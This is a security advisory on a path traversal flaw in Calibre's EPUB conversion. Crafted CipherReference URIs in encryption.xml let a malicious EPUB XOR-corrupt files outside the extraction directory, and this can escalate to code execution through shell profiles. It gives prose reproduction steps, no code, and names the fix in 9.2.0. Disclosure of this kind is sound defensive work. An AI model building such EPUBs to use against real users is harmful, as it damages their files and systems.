Calibre Path Traversal Vulnerability in EPUB Conversion Leading to Arbitrary File Corruption and Code Execution

A path traversal vulnerability has been identified in Calibre's EPUB conversion process, allowing a malicious EPUB file to corrupt arbitrary existing files that are writable by the Calibre process. This issue affects Calibre versions through 9.1.0. During the conversion, Calibre improperly resolves CipherReference URIs from the encryption metadata of EPUB files to absolute filesystem paths. It opens these paths in read-write mode, even when they point outside the designated conversion directory. As a result, files outside the EPUB extraction directory can be modified, leading to corruption. This vulnerability has been confirmed on Calibre 9.1.0, both on Windows 11 (x64) and Linux.

Impact

Exploitation of this vulnerability causes corruption of any existing file that is writable by the Calibre process and located outside the conversion extraction directory. The corruption involves XOR-modifying the first approximately 1KB of the file with the UUID of the EPUB book, which can lead to data loss or cause applications to malfunction. Additionally, this vulnerability can be escalated to achieve arbitrary code execution by targeting specific files with predictable content, such as shell profile files, and manipulating the UUID used in the EPUB to execute commands.

Reproduction

To reproduce this vulnerability, create a malicious EPUB file that includes a crafted `META-INF/encryption.xml` file. This file should contain a `CipherReference` URI that uses path traversal to point to a writable file outside the EPUB extraction directory. Once the EPUB is created, it can be converted using Calibre's GUI or the `ebook-convert` command-line tool. The result will be a corruption of the targeted file, which can be verified by checking the file's content after the conversion.

Remediation

Users can update to Calibre version 9.2.0 or later, where this vulnerability has been fixed.